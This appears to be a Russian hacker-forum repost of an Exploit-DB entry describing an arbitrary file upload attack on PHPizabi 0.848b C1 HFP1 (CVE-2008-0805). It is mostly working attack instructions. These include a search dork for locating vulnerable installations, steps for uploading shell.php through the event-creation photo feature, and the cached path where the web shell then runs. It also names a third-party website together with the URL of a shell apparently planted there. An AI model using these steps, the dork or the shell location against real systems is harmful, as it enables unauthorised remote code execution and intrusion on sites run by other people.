Exploit PHPizabi 0.848b C1 HFP1 - Arbitrary File Upload

  • Автор темы Exploiter
  • Дата начала
  • Просмотров 20300 Просмотров

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5136
Проверка EDB
  1. Пройдено
Автор
ZORLU
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-0805
Дата публикации
2008-02-17
Код:
############################################
Powered by PHPizabi v0.848b C1 HFP1 remote file upload

author: ZoRLu

home: www.yildirimordulari.org

contact: [email protected]

dork: "Powered by PHPizabi v0.848b C1 HFP1"

############################################

exploit:

http://localhost/izabi/system/cache/pictures/id_shell.php

-first register web site

-Create an event on the click and create an event ( direct create event url: http://localhost/izabi/?L=events.create )

-event title and description write. show to select All the users. gözat button click and shell.php upload

-after go to event page. upload photo right click. open the menu click to properties. copy the url

example:

http://localhost/izabi/system/image.php?file=xxx_shell.php&width=500

and 

exploit:

http://localhost/izabi/system/cache/pictures/xxx_shell.php

example web site:

http://bitchinindie.com/system/image.php?file=597_shell.php&width=500

exploit shell.php

http://bitchinindie.com/system/cache/pictures/597_shell.php


##################################################

thanx: str0ke, FaLCaTa, ReD_KaN, edish, harded, aRKi, z3h!r, the_KaM!L, vur6un, siircicocuk, Dr. SaLTuK, kasýrga(lavrens), avkidis, head_hunter 

and all users yildirimordulari.org

siircicocuk nerelerdesin be kanka msn e takýl özlettin kendini :)))

## yildirimordulari.org açýlýr mý açýlmaz mý orasý bilinmez ama bilinen birþey var o bir efsane ##

#################################################

# milw0rm.com [2008-02-17]
 
Источник
www.exploit-db.com

Похожие темы